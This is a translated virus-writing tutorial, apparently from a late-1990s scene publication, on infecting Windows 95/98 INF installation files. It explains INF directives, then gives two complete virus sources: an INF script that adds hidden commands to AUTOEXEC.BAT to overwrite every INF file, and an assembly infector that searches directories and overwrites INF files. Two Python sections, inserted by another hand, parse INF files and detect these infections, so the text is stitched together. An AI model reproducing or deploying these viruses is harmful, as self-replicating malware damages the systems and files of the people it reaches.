So, infecting INF files. In this article I will describe some methods and INF file commands, everything that I could find and that I have made myself.
[ Description ]
INF files are installation files consisting of several sections. Each section is intended for performing a certain task.
[ Brief description of some commands ]
[Name] - Square brackets mark the beginning of a new section.
; - Comment in INF files.
Signature = $Chicago$ - Sets the operating system for the INF file. At the time of writing, Win95 was still code-named Chicago.
CopyFile - Contains the information needed to copy the specified file or files into a directory. You can instruct the system to copy a single file; for that, a prefix symbol must be placed before the file name. The file is then copied into the DefaultDestDir directory defined in the DestinationDirs section of the INF file.
RenFile - Allows renaming the specified file.
DelFile - Allows deleting the specified file.
AddReg - Allows specifying keys or values to be added to the registry.
DelReg - Allows specifying keys or values to be removed from the registry.
UpdateAutoBat - This section holds the commands that modify the autoexec.bat file.
DefaultDestDir - Allows specifying the destination directory.
Reboot aka Restart - Commands that reboot the system or restart the machine once the virus installation has finished.
UpdateAutoBat
=-=-=-=-=-=-=
CmdDelete - Specifies a command that should be removed from autoexec.bat. This line is processed before the CmdAdd line.
CmdAdd - Specifies a command to be added to autoexec.bat.
DestinationDirs
=-=-=-=-=-=-
00 - the current directory?
01 - source drive:\path
04 - backup directory?
10 - Windows directory
11 - System directory
12 - Iosubsys directory
13 - Command directory?
14 - Control Panel directory
15 - Printers directory
16 - Workgroup directory?
17 - Inf directory
18 - Help directory
20 - Fonts directory?
21 - Viewers directory?
22 - VMM32 directory?
26 - Winboot directory
28 - Winboot host directory
30 - root directory of the boot device
32 - root directory of the previous Windows version? (if there is one)
33 - root directory of the previous MS-DOS version? (if there is one)
AddReg and DelReg
=-=-=-=-=-=-=-=-
The [Add Registry] section allows adding keys and values to the registry. Optionally, the value data can be set as well. The name of the [add_registry section] must be given by an AddReg entry in the [ClassInstall], [Install] or [DefaultInstall] section.
The [Delete Registry] section is used to remove keys and value names from the registry.
CopyFiles
=-=-=-=-
The CopyFiles entry uses the following syntax; the parameters are sourcefile and temporaryFile.
RenFiles
=-==-=
The RenFiles entry uses the following syntax; the parameters are newfile and oldfile, and any number of entries may be included.
DelFiles
=-=-=-=
The DelFiles entry uses the following syntax; the parameter is filename. You can find a set of examples in the windows\inf directory.
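As an added example for this section (my own code, not the author's), here is a small Python parser that reads an INF file into its sections and reports the directives described above that a defender would want to review: an INF being copied out under another name, the CmdAdd lines that UpdateAutoBat would write into autoexec.bat (and whether they redirect the console with ctty), and a DefaultDestDir that resolves to a root directory. The two sample INF texts, the function names and the ROOT_LDIDS table are my own constructions; the `@` check for the single-file CopyFiles form follows the Win9x INF convention rather than anything spelled out in this text.

```python
"""Parse a Win9x-style INF file and flag installer directives that a defender
would want to review. Added example for this article; not the author's code.

Assumptions (not from the article): an INF is plain text made of `[Section]`
headers followed by `key = value` lines or bare file-list lines, with `;`
comments. The two sample INF texts below are constructed for this example.
"""
import re
from collections import OrderedDict

# Logical disk ids from the article's DestinationDirs list that resolve to a
# root directory rather than the usual Windows or System directory.
ROOT_LDIDS = {
    "30": "root directory of the boot device",
    "32": "root directory of the previous Windows version",
    "33": "root directory of the previous MS-DOS version",
}

# Constructed sample: an ordinary driver install.
BENIGN_INF = """\
[version]
signature = "$CHICAGO$"
[DefaultInstall]
CopyFiles = Drv.Files
[DestinationDirs]
DefaultDestDir = 11      ; System directory
[Drv.Files]
mydrv.vxd
"""

# Constructed sample with the shape of the script described in this article.
SUSPICIOUS_INF = """\
[version]
signature = "$CHICAGO$"
[DefaultInstall]
CopyFiles = Drop.Files
UpdateAutoBat = Bat.Patch
[Bat.Patch]
CmdAdd = "@ctty", "nul"
CmdAdd = "ctty", "con"
[DestinationDirs]
DefaultDestDir = 30      ; root of the boot drive
[Drop.Files]
payload.sys, sample.inf  ; destination, source: the INF itself under a new name
"""


def parse_inf(text):
    """Return an OrderedDict mapping section name -> list of (key, value).
    Bare lines (file lists) are stored with key None."""
    sections = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        header = re.match(r"^\[\s*(.+?)\s*\]$", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
            continue
        if current is None:
            continue                              # text before any section
        key, sep, value = line.partition("=")
        if sep:
            sections[current].append((key.strip(), value.strip()))
        else:
            sections[current].append((None, line))
    return sections


def section(sections, name):
    """Case-insensitive section lookup (INF section names are not case-sensitive)."""
    for sec, entries in sections.items():
        if sec.lower() == name.lower():
            return entries
    return []


def values(sections, sec_name, key):
    """All values of `key` inside section `sec_name`, case-insensitively."""
    return [v for k, v in section(sections, sec_name) if k and k.lower() == key.lower()]


def assess_inf(text):
    """Return a list of findings describing what this INF would do on install."""
    s = parse_inf(text)
    findings = []
    install = next((n for n in s if n.lower() in ("defaultinstall", "install")), None)
    if install is None:
        return findings
    # CopyFiles: look for an INF being written out under a different extension.
    for copy_sec in values(s, install, "CopyFiles"):
        if copy_sec.startswith("@"):             # single-file form (Win9x INF convention)
            findings.append("CopyFiles copies the single file %s" % copy_sec[1:])
            continue
        for _, entry in section(s, copy_sec):
            parts = [p.strip() for p in entry.split(",")]
            dest = parts[0]
            src = parts[1] if len(parts) > 1 and parts[1] else dest
            if src.lower().endswith(".inf") and not dest.lower().endswith(".inf"):
                findings.append("CopyFiles writes INF %s out as %s" % (src, dest))
    # UpdateAutoBat: every CmdAdd line lands in autoexec.bat and runs at boot.
    for bat_sec in values(s, install, "UpdateAutoBat"):
        for key, value in section(s, bat_sec):
            if key and key.lower() == "cmdadd":
                findings.append("UpdateAutoBat adds to autoexec.bat: %s" % value)
                if "ctty" in value.lower():
                    findings.append("  ctty redirects the console, hiding the commands' output")
    # DestinationDirs: a root-level default destination is unusual for a driver install.
    for ldid in values(s, "DestinationDirs", "DefaultDestDir"):
        if ldid in ROOT_LDIDS:
            findings.append("DefaultDestDir = %s (%s)" % (ldid, ROOT_LDIDS[ldid]))
    return findings


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_INF), ("suspicious", SUSPICIOUS_INF)):
        print(name, assess_inf(text) or ["no findings"])
```

Run it against any INF from the windows\inf directory to see what a normal install looks like; the benign sample produces no findings, while the constructed suspicious one reports the renamed INF, both CmdAdd lines and the root-directory destination.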
Examples
~~~~~~
So let's move on to writing viruses for INF files. Two examples of INF viruses are described below: the first as an INF script, the second in asm. Right away I want to say that writing a parasitic INF virus is in general impossible, or nearly so.
-[f0jar.inf]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
;The description
;***************
;Script-virus infecting a Windows install INF-file. When software is
;installed the standard way, Windows finds the INF-file, processes it and
;carries out the script instructions. On activation the virus script
;creates, in the root directory of the boot drive, a file named f0jer.sys,
;copies the carrier file (the infected INF-file) into it and appends some
;DOS commands to the end of AUTOEXEC.BAT. At the next reboot of Windows
;these commands search the windows\system directory and the current drive
;for *.INF-files and copy the carrier over each of them.
;Code of a virus
;***************
; f0jar by ULTRAS
[version]
signature = "$CHICAGO$"
; signature win95/98
SetupClass=BASE
[DefaultInstall]
CopyFiles = Ultra.File ; copy the files listed in section Ultra.File
UpdateAutoBat = Patch.It
; write to autoexec.bat as described in section Patch.It
[Patch.it]
; first remove our commands from autoexec.bat
CmdDelete = "@ctty", "nul"
CmdDelete = "for", " %% b in (%windir%\system\*.inf
*.inf) do copy f0jer.sys %% b "
CmdDelete = "ctty", "con"
; then write our commands into autoexec.bat
CmdAdd = "@ctty", "nul"
CmdAdd = "for", " %% b in (%windir%\system\*.inf
*.inf) do copy f0jer.sys %% b "
CmdAdd = "ctty", "con"
[DestinationDirs]
DefaultDestDir = 30
; the root directory of the boot device
[SourceDisksNames]
1 = "ULTRAS", " ", 1
[ Ultra. File]
; copy ultras.inf to f0jer.sys
f0jer.sys, ultras.inf
Now example 2: infecting INF files in asm. The virus was written very quickly, so it may contain mistakes.
-[z0x.asm]-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
; Z0x.INF - Example INF infector in asm
; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; This virus infects Windows install INF-files. When software is installed
; the standard way, Windows finds the INF-file, processes it and carries out
; the script instructions. On activation the virus script creates, in the
; root directory of the boot drive, a file named z0x.sys, copies the carrier
; file (the infected INF-file) into it and appends some DOS commands to the
; end of AUTOEXEC.BAT. When Windows loads, these commands rename z0x.sys to
; z0x.com and run it, so the file executes as an ordinary COM-file.
.model tiny
.code
org 100h
start:
db ';', 0 ; infection marker
jmp v_start ; jmp virus start
idz db 'U', 0 ; infection marker
db 13,10
db 13,10
db '[version]',13,10
db 'signature="$CHICAGO$"',13,10
;signature win95/98
db 'SetupClass=BASE',13,10
db 13,10
db '[DefaultInstall]',13,10
db 'CopyFiles = Ultra.File',13,10
; copy the files listed in section Ultra.File
db 'UpdateAutoBat = Patch.It',13,10
; write to autoexec.bat as described in section Patch.It
db 13,10
db '[Patch.it]',13,10
db 'CmdDelete = "@ctty", "null"',13,10
db 'CmdDelete = "ren", "z0x.sys
z0x.com"',13,10
db 'CmdDelete = "@", "z0x.com"',13,10
db 'CmdDelete = "ctty", "con"',13,10
db 13,10
db 'CmdAdd = "@ctty", "null"',13,10
db 'CmdAdd = "ren", "z0x.sys z0x.com"',13,10
db 'CmdAdd = "@", "z0x.com"',13,10
db 'CmdAdd = "ctty", "con"',13,10
db 13,10
db '[DestinationDirs]',13,10
db 'DefaultDestDir = 30',13,10
; the root directory of the boot device
db 13,10
db '[SourceDisksNames]',13,10
db '1="ULTRAS","",1',13,10
db 13,10
db '[Ultra.File]',13,10
db 'z0x.sys, ultras.inf',13,10 ; copy ultras.inf to z0x.sys
db 13,10
db ";"
v_start:
mov max_inf,0
get_dir:
mov ah,47h
lea si,old_dir
xor dl,dl
int 21h
find_:
lea dx,filemask
call find_file
return:
cmp max_inf,9
jae quit
mov ah,3bh
lea dx,dot_dot
int 21h
jnc find_
quit:
mov ah,3bh
lea dx,old_dir
int 21h
int 20h
find_file:
mov ah,4eh
mov cx,7
find_it:
int 21h
jc return
mov dx,9eh
get_attributes:
mov ax,4300h
int 21h
mov file_at,cx
set_attributes:
mov ax,4301h
xor cx,cx
int 21h
open_file:
mov ax,3d02h
int 21h
xchg bx,ax
get_time_date:
mov ax,5700h
int 21h
push cx
push dx
check:
mov ah,3fh
lea dx,buff
mov cx,4
int 21h
cmp byte ptr [buff+5],'U'
je close_file
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
write_virus:
mov ah,40h
mov cx,_end-start
lea dx,start
int 21h
inc max_inf
restore_date_time:
mov ax,5701h
pop dx
pop cx
int 21h
close_file:
mov ah,3eh
int 21h
mov cx,file_at
mov dx,9eh
mov ax,4301h
int 21h
cmp max_inf,9
jne find_next
jmp quit
find_next:
mov ah,4fh
jmp find_it
filemask db '*.inf',0
dot_dot db '..',0
virus_name db 'Z0x by [U]',0
virz equ _end-offset start
_end:
max_inf db ?
file_at dw ?
buff db 6 dup(?)
old_dir db 64 dup(?)
end start
;ULTRAS/MATRiX 1999
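As an added example (my own code, not the author's), here is the host-side check a defender would run for the two artifacts these examples leave behind: an INF whose first bytes were overwritten by the z0x infector, and the block of commands that f0jar and z0x append to AUTOEXEC.BAT wrapped in ctty nul / ctty con so that nothing shows on the console. The marker layout is read off the z0x source above (';',0 at offset 0, a near jmp, then 'U',0 at offset 5); the sample header bytes, the autoexec.bat lines and the function names are constructed for this example.

```python
"""Host-side triage for the two artifacts this article describes: an INF
whose start was overwritten by the z0x infector, and the command block that
f0jar / z0x append to AUTOEXEC.BAT. Added example; not the author's code.

Assumptions (not from the article): the marker layout is taken from the
z0x source (';',0 at offset 0, a 3-byte near jmp, then 'U',0 at offset 5);
the INF header bytes and autoexec.bat lines below are constructed samples.
"""
import re

# Constructed: the start of a z0x-overwritten INF, and a normal INF header.
INFECTED_HEAD = b";\x00\xe9\x00\x00U\x00\r\n\r\n[version]\r\nsignature=\"$CHICAGO$\"\r\n"
CLEAN_HEAD = b"[version]\r\nsignature=\"$CHICAGO$\"\r\nSetupClass=BASE\r\n"

# Constructed autoexec.bat contents, before and after the script's CmdAdd lines.
CLEAN_AUTOEXEC = [
    "@ECHO OFF",
    "PATH C:\\WINDOWS;C:\\WINDOWS\\COMMAND",
    "SET TEMP=C:\\TEMP",
]
PATCHED_AUTOEXEC = CLEAN_AUTOEXEC + [
    "@ctty nul",
    "ren z0x.sys z0x.com",
    "@z0x.com",
    "ctty con",
]


def inf_overwritten_marker(head):
    """Return the reasons the INF header bytes look overwritten by z0x.
    A genuine INF is text: it never starts with ';' followed by a NUL byte,
    and it contains no NUL bytes at all."""
    reasons = []
    if head[:2] == b";\x00":
        reasons.append("starts with ';' NUL (z0x infection marker)")
    if len(head) > 6 and head[5:7] == b"U\x00":
        reasons.append("'U' NUL at offset 5 (z0x idz marker)")
    if b"\x00" in head:
        reasons.append("%d NUL bytes in a text file" % head.count(b"\x00"))
    return reasons


# ctty nul sends console output to the NUL device; ctty con restores it.
CTTY_OFF = re.compile(r"^@?ctty\s+nul\b", re.I)
CTTY_ON = re.compile(r"^@?ctty\s+con\b", re.I)


def hidden_command_blocks(lines):
    """Return the command blocks in autoexec.bat that run between 'ctty nul'
    and 'ctty con', i.e. with their console output redirected away."""
    blocks, inside, current = [], False, []
    for line in lines:
        text = line.strip()
        if CTTY_OFF.match(text):
            inside, current = True, []
        elif CTTY_ON.match(text) and inside:
            blocks.append(current)
            inside = False
        elif inside:
            current.append(text)
    if inside:                      # ctty nul never restored: still hidden
        blocks.append(current)
    return blocks


if __name__ == "__main__":
    print("clean INF:", inf_overwritten_marker(CLEAN_HEAD))
    print("infected INF:", inf_overwritten_marker(INFECTED_HEAD))
    print("hidden autoexec blocks:", hidden_command_blocks(PATCHED_AUTOEXEC))
```

On a real machine the first function would be fed the first few dozen bytes of each *.inf under windows\inf and the root of the boot drive, and the second the lines of C:\AUTOEXEC.BAT; any hidden block that renames or runs a file from the root directory is what this article's scripts leave behind.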